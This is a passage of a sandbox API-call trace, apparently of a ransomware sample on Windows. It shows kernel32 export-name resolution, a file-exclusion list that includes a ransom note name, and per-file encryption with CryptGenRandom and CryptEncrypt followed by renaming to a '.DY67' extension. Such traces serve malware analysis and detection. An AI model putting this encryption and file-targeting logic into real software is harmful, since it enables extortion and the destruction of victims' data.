lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.515] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.515] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.515] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.515] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.515] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.515] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.515] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.515] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.515] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.515] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.515] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.515] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.516] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.516] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.516] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.516] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.516] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.516] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.516] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.516] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.516] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.516] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.516] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.516] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.516] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.516] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.516] lstrlenA (lpString="DELETEATOM") returned 10 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.516] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.516] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.516] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.517] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.517] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.517] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.517] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.517] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.517] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.517] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.517] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.517] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.517] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.517] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.517] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.517] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.517] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.517] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.517] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.517] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.518] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.518] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.518] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.518] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.518] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.518] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.518] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.518] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.518] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.518] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.518] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.518] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.518] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.518] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.518] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.518] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.518] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.518] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.518] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.519] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.519] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.519] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uM20gJ1uzhQ3_i.pps") returned 64 [0082.519] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uM20gJ1uzhQ3_i.pps.DY67") returned 69 [0082.519] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uM20gJ1uzhQ3_i.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\um20gj1uzhq3_i.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uM20gJ1uzhQ3_i.pps.DY67" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\um20gj1uzhq3_i.pps.dy67"), dwFlags=0x0) returned 1 [0082.520] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.520] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.520] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.521] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x215db650, ftCreationTime.dwHighDateTime=0x1d4c714, ftLastAccessTime.dwLowDateTime=0x7f2a2700, ftLastAccessTime.dwHighDateTime=0x1d4d11e, ftLastWriteTime.dwLowDateTime=0x7f2a2700, ftLastWriteTime.dwHighDateTime=0x1d4d11e, nFileSizeHigh=0x0, nFileSizeLow=0x187b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="v5RW.gif", cAlternateFileName="")) returned 1 [0082.521] lstrcmpiW (lpString1="v5RW.gif", lpString2="DECRYPT-FILES.txt") returned 1 [0082.521] lstrcmpiW (lpString1="v5RW.gif", lpString2="autorun.inf") returned 1 [0082.521] lstrcmpiW (lpString1="v5RW.gif", lpString2="boot.ini") returned 1 [0082.521] lstrcmpiW (lpString1="v5RW.gif", lpString2="desktop.ini") returned 1 [0082.521] lstrcmpiW (lpString1="v5RW.gif", lpString2="ntuser.dat") returned 1 [0082.521] lstrcmpiW (lpString1="v5RW.gif", lpString2="iconcache.db") returned 1 [0082.521] lstrcmpiW (lpString1="v5RW.gif", lpString2="bootsect.bak") returned 1 [0082.521] lstrcmpiW (lpString1="v5RW.gif", lpString2="ntuser.dat.log") returned 1 [0082.521] lstrcmpiW (lpString1="v5RW.gif", lpString2="thumbs.db") returned 1 [0082.521] lstrcmpiW (lpString1="v5RW.gif", lpString2="Bootfont.bin") returned 1 [0082.521] lstrlenW (lpString="v5RW.gif") returned 8 [0082.521] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0082.521] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0082.521] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0082.521] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0082.521] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.521] lstrlenW (lpString="v5RW.gif") returned 8 [0082.521] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.521] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="v5RW.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\v5RW.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\v5RW.gif" [0082.521] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\v5RW.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\v5rw.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.521] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=100280) returned 1 [0082.522] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.522] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0082.522] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.522] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.522] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.522] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.522] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0082.524] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.524] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0082.525] CloseHandle (hObject=0x444) returned 1 [0082.525] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.525] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.526] CloseHandle (hObject=0x0) returned 0 [0082.526] CloseHandle (hObject=0x440) returned 1 [0082.526] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.526] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.527] GetTickCount () returned 0x114d1b1 [0082.527] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.527] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.527] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.527] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.527] lstrlenA (lpString="kernel32.dll") returned 12 [0082.528] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.528] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.528] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.528] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.528] lstrlenA (lpString="ADDATOMA") returned 8 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.528] lstrlenA (lpString="ADDATOMW") returned 8 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.528] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.528] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.528] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.528] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.528] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.528] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.528] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.528] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.528] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.528] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.529] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.529] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.529] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.529] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.529] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.529] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.529] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.529] lstrlenA 